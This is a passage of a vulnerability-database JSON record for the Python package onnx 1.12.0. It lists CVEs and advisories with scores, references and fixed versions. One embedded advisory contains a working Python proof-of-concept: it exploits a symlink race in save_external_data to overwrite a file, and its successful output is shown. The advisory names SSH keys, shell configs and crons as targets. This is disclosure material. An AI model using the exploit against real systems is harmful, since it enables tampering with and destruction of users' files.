"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27319" }, { "reference_url": "https://github.com/advisories/GHSA-h8wv-9h96-m4hr", "reference_id": "GHSA-h8wv-9h96-m4hr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h8wv-9h96-m4hr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39078?format=api", "purl": "pkg:pypi/onnx@1.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0" } ], "aliases": [ "CVE-2024-27319", "GHSA-h8wv-9h96-m4hr", "PYSEC-2024-223" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8xb-18u2-6qbe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9337?format=api", "vulnerability_id": "VCID-gc3c-f7yt-nkc1", "summary": "A vulnerability in the `download_model` function of the onnx/onnx framework, before and including version 1.16.1, allows for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. This vulnerability can be exploited by an attacker to overwrite files in the user's directory, potentially leading to remote command execution.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-7776", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0526", "scoring_system": "epss", "scoring_elements": "0.90134", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-7776" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f" }, { "reference_url": "https://github.com/onnx/onnx/pull/6222", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx/pull/6222" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml" }, { "reference_url": "https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:51:57Z/" } ], "url": "https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7776", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7776" }, { "reference_url": "https://github.com/advisories/GHSA-h36j-8vv3-cj52", "reference_id": "GHSA-h36j-8vv3-cj52", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-h36j-8vv3-cj52" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/43602?format=api", "purl": "pkg:pypi/onnx@1.16.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/47711?format=api", "purl": "pkg:pypi/onnx@1.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.17.0" } ], "aliases": [ "CVE-2024-7776", "GHSA-h36j-8vv3-cj52", "PYSEC-2025-10" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gc3c-f7yt-nkc1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/324929?format=api", "vulnerability_id": "VCID-hcza-pev8-vfh5", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27489", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09643", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27489" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/" } ], "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190", "reference_id": "1133190", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453929", "reference_id": "2453929", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453929" }, { "reference_url": "https://github.com/advisories/GHSA-3r9x-f23j-gc73", "reference_id": "GHSA-3r9x-f23j-gc73", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3r9x-f23j-gc73" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-27489", "GHSA-3r9x-f23j-gc73" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hcza-pev8-vfh5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/346680?format=api", "vulnerability_id": "VCID-hudf-3jt7-xkaf", "summary": "ONNX: TOCTOU arbitrary file read/write in save_external_dat\n### Summary\n\nThe `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.\nRegarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.\nThe mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188\n\n### Details\n\n#### TOCTOU\nThe vulnerable code pattern:\n```python\n # CHECK - Is this a file?\n if not os.path.isfile(external_data_file_path):\n # Line 228-229: USE #1 - Create if it doesn't exist\n with open(external_data_file_path, \"ab\"):\n pass\n \n # Open for writing\n with open(external_data_file_path, \"r+b\") as data_file:\n # Lines 233-243: Write tensor data\n data_file.seek(0, 2)\n if info.offset is not None:\n file_size = data_file.tell()\n if info.offset > file_size:\n data_file.write(b\"\\0\" * (info.offset - file_size))\n data_file.seek(info.offset)\n offset = data_file.tell()\n data_file.write(tensor.raw_data)\n```\nThere is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nmport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n print(f\"[*] Working directory: {tmpdir}\")\n\n # Create a \"sensitive\" file that we'll overwrite\n sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n with open(sensitive_file, 'w') as f:\n f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n original_content = open(sensitive_file, 'rb').read()\n print(f\"[*] Created sensitive file: {sensitive_file}\")\n print(f\" Original content: {original_content}\")\n\n # Create a simple ONNX model with a large tensor\n print(\"[*] Creating ONNX model with external data...\")\n\n # Create a tensor with data > 1KB (to trigger external data)\n large_array = np.ones((100, 100), dtype=np.float32) # 40KB tensor\n large_tensor = from_array(large_array, name='large_weight')\n\n # Create a minimal model\n model = helper.make_model(\n helper.make_graph(\n [helper.make_node('Identity', ['input'], ['output'])],\n 'minimal_model',\n [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n [large_tensor]\n )\n )\n\n # Save model with external data to create the external data file\n model_path = os.path.join(tmpdir, \"model.onnx\")\n external_data_name = \"data.bin\"\n external_data_path = os.path.join(tmpdir, external_data_name)\n\n onnx.save_model(\n model, \n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n\n print(f\"[+] Model saved: {model_path}\")\n print(f\"[+] External data created: {external_data_path}\")\n\n # Now comes the attack: replace the external data file with a symlink\n print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n # Remove the legitimate external data file\n if os.path.exists(external_data_path):\n os.remove(external_data_path)\n print(f\" Removed: {external_data_path}\")\n\n # Create symlink pointing to sensitive file\n os.symlink(sensitive_file, external_data_path)\n print(f\" Created symlink: {external_data_path} -> {sensitive_file}\")\n\n # Now load and re-save the model, which will trigger the vulnerability\n print(\"Loading model and saving with external data...\")\n try:\n # Load the model (without loading external data)\n loaded_model = onnx.load(model_path, load_external_data=False)\n\n # Modify the model slightly (to ensure we write new data)\n loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n # Save again - this will call save_external_data() and follow the symlink\n onnx.save_model(\n loaded_model,\n model_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=external_data_name,\n size_threshold=1024\n )\n except Exception as e:\n print(f\"[-] Error: {e}\")\n \n # Check if the sensitive file was overwritten\n print(\"[*] Checking if sensitive file was modified...\")\n modified_content = open(sensitive_file, 'rb').read()\n \n print(f\" Original size: {len(original_content)} bytes\")\n print(f\" Current size: {len(modified_content)} bytes\")\n print(f\" Original content: {original_content[:50]}\")\n print(f\" Current content: {modified_content[:50]}...\")\n print()\n \n if modified_content != original_content:\n print(\"[!] Success!\")\n else:\n print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n Removed: /tmp/tmpqy7z88_l/data.bin\n Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n Original size: 33 bytes\n Current size: 40033 bytes\n Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n Current content: b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nSuccessfully overwritting the \"sensitive data\" file.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. Path canonicalization", "references": [ { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6" }, { "reference_url": "https://github.com/advisories/GHSA-q56x-g2fj-4rj6", "reference_id": "GHSA-q56x-g2fj-4rj6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q56x-g2fj-4rj6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "GHSA-q56x-g2fj-4rj6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hudf-3jt7-xkaf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9580?format=api", "vulnerability_id": "VCID-ssfy-y61v-mkfm", "summary": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28500", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01552", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28500" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m" }, { "reference_url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/" } ], "url": "https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28500", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28500" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209", "reference_id": "1131209", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448518", "reference_id": "2448518", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448518" }, { "reference_url": "https://github.com/advisories/GHSA-hqmj-h5c6-369m", "reference_id": "GHSA-hqmj-h5c6-369m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hqmj-h5c6-369m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/47721?format=api", "purl": "pkg:pypi/onnx@1.21.0rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-28500", "GHSA-hqmj-h5c6-369m", "PYSEC-2026-103" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ssfy-y61v-mkfm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/329543?format=api", "vulnerability_id": "VCID-zxjc-1tkz-ykfg", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34445.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34445", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00207", "scoring_system": "epss", "scoring_elements": "0.43083", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34445" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b" }, { "reference_url": "https://github.com/onnx/onnx/pull/7751", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/pull/7751" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T17:59:29Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34445", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34445" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606", "reference_id": "1132606", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132606" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453930", "reference_id": "2453930", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453930" }, { "reference_url": "https://github.com/advisories/GHSA-538c-55jv-c5g9", "reference_id": "GHSA-538c-55jv-c5g9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-538c-55jv-c5g9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34445", "GHSA-538c-55jv-c5g9" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zxjc-1tkz-ykfg" } ], "fixing_vulnerabilities": [], "risk_score": "4.1", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.12.0" }